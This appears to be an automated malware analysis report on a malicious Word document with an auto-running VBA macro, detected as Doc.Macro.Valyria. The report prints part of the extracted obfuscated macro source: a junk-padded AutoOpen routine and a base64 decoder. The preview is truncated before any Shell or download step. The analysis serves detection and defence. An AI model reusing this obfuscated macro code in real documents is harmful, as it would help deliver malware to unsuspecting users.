Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 130bd7967b29afea…

MALICIOUS

Office (OLE)

Size: 155.0 KB
Created: 2017-05-31 13:39:00
Authoring application: Microsoft Office Word
First seen: 2017-11-13
MD5: 77efe8bdd39d86f3d25d427a37964ea7
SHA-1: ecb4900b46e440ccd26c058fd1a7785fcf27c809
SHA-256: 130bd7967b29afea66711a579e5e593c6f22676374ba47f045957025f91f822b
Risk Score: 242

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro. The macro runs automatically via AutoOpen and makes a Shell() call, indicating an attempt to execute arbitrary commands. This strongly suggests downloader or dropper functionality, where the macro fetches and executes a secondary payload. The ClamAV detection name 'Doc.Macro.Valyria-6327969-0' further supports the malicious verdict.

Heuristics 7

  • ClamAV: Doc.Macro.Valyria-6327969-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Valyria-6327969-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
    • http://purl.org/dc/elements/1.1/ In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# In document text (OLE body)
    • http://ns.adobe.com/tiff/1.0/ In document text (OLE body)
    • http://ns.adobe.com/exif/1.0/ In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ In document text (OLE body)
    • http://www.iec.ch In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 23796 bytes
SHA-256: a7a2a436ff4ddedafc7649fc1c297b9a7c84b92e946217c960465665b61a636f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "bdIFv"
Sub AutoOpen()
Dim tVMuS As Integer
tVMuS = 335 - 169
If tVMuS <> 39281 Then
ct6CvrLM = -11527
Else
upfdqHX = 22409.432849937
End If
Dim v6fJBw As Integer
v6fJBw = 335 - 169
If v6fJBw > 39281 Then
PF132 = False
Else
dxyIbmnV = 2969.1845256388
End If
Dim myjwYl3RW As Integer
myjwYl3RW = 335 - 169
If myjwYl3RW = 39281 Then
idqb1g = 216
Else
RbVnW7 = 0
End If
RkCUaI
Dim jDNvz0Z As Integer
jDNvz0Z = 418 - 368
If jDNvz0Z <> 41244 Then
DxEui = AYIc6ng
Else
IV29b = AYIc6ng
End If
Dim ioAtJbH As Integer
ioAtJbH = 418 - 368
If ioAtJbH <> 41244 Then
NhOvVmcLa = 180
Else
ZP9iS = 46969.270308115
End If
Dim F5iHv As Integer
F5iHv = 418 - 368
If F5iHv < 41244 Then
tCFHYkStW = True
Else
g4XDA = -1581222382
End If
Dim BZFKO6uG As Integer
BZFKO6uG = 6812 / 524
If BZFKO6uG > 62619 Then
Z251hb6B = HkguNU
Else
ALVtI2i8 = False
End If
Dim fCBeM97 As Integer
fCBeM97 = 6812 / 524
If fCBeM97 <> 62619 Then
vlKjNWsZV = 67
Else
P3J9vUdh = 24033
End If

End Sub

Attribute VB_Name = "nPI8yK"
Private Const qdvLKk = 16711680
Private Const l3oul4B = 65280
Private Const CEAjCc = 255
Private Const ndyoCX = 262144
Private Const FGEdzILX = 4096
Private Const S5hFk = 64
Private Const F7Utn = 256
Private Const BHG8NrlTM = 65536
Public Function Sn8vfim(gh4RuE7Gk As String) As String
Dim UaWXj() As Byte, bIn() As Byte, bTrans(255) As Byte, lPowers6(63) As Long, lPowers12(63) As Long
Dim lPowers18(63) As Long, lQuad As Long, iPad As Integer, lChar As Long, lPos As Long, sOut As String
Dim lTemp As Long
Dim EHz2XJ As Integer
EHz2XJ = 277 - 206
If EHz2XJ = 44007 Then
tfRyu4dHn = 45156.819918107
Else
FCtnE = 20544
End If
Dim IGELjYDvs As Integer
IGELjYDvs = 277 - 206
If IGELjYDvs < 44007 Then
BBk6Z0F = 29407
Else
EfVUsB = 42522.117922804
End If
Dim MUaWF As Integer
MUaWF = 277 - 206
If MUaWF > 44007 Then
fFCys = 32283.228682626
Else
GwnEWz = 92
End If
gh4RuE7Gk = Replace(gh4RuE7Gk, vbCr, vbNullString)
Dim NwRTcJ8j As Integer
NwRTcJ8j = 90 + 88
If NwRTcJ8j > 35021 Then
ASJGxB = 9481.8215327367
Else
QzWlB = 4475
End If
Dim Iim9h8GN As Integer
Iim9h8GN = 90 + 88
If Iim9h8GN <> 35021 Then
EiVPHfsd = BPFIkCS3L
Else
VUWp5gh = 13062
End If
Dim zLIKGS90 As Integer
zLIKGS90 = 90 + 88
If zLIKGS90 < 35021 Then
rjUNO = 39176.998861444
Else
THhN3kL = -26841
End If
Dim DOLWZ As Integer
DOLWZ = -1 + 130
If DOLWZ > 45368 Then
GvoS6cpKm = 30
Else
XeBIjK0 = 3342.1421932239
End If
Dim eC1gyln As Integer
eC1gyln = -1 + 130
If eC1gyln < 45368 Then
AtaMZ6P = 560.51457941202
Else
s0xn23PA = -16715
End If
Dim PMZFY8Qwp As Integer
PMZFY8Qwp = -1 + 130
If PMZFY8Qwp > 45368 Then
huxK0X = False
Else
u9xPmiy = False
End If
gh4RuE7Gk = Replace(gh4RuE7Gk, vbLf, vbNullString)
Dim zqY6m As Integer
zqY6m = 4896 / 32
If zqY6m <> 40267 Then
Kwq9bQs1r = 18168.426158892
Else
sc9RA2 = 120
End If
Dim KNkDm As Integer
KNkDm = 4896 / 32
If KNkDm <> 40267 Then
ZYqK21mx = True
Else
W1j42TWf7 = 43555.157577191
End If
Dim puaGbdhM As Integer
puaGbdhM = 306 - 179
If puaGbdhM > 47453 Then
MvfHp = 0
Else
ho6zpXs1E = 0
End If
Dim P7J4yS As Integer
P7J4yS = 306 - 179
If P7J4yS <> 47453 Then
uDTjtx = 26706.771965411
Else
Nuwif = False
End If
lTemp = Len(gh4RuE7Gk) Mod 4
Dim B4glsh As Integer
B4glsh = 154 + 8
If B4glsh > 58054 Then
IYMCl4 = 50818.27949097
Else
Gh3gZGzM = 11957
End If
Dim vi43L0e2 As Integer
vi43L0e2 = 154 + 8
If vi43L0e2 < 58054 Then
IHMu7 = 62083.387963299
Else
ddmxc = 0
End If
Dim osdWV0a As Integer
osdWV0a = 14740 / 110
If osdWV0a <> 39059 Then
QBcZ0 = 0
Else
VxPTVOM = 39114.756126649
End If
Dim bChSr As Integer
bChSr = 14740 / 110
If bChSr > 39059 Then
mEvl3asw = 4827.6607343674
Else
dafPg = -1903
... (truncated)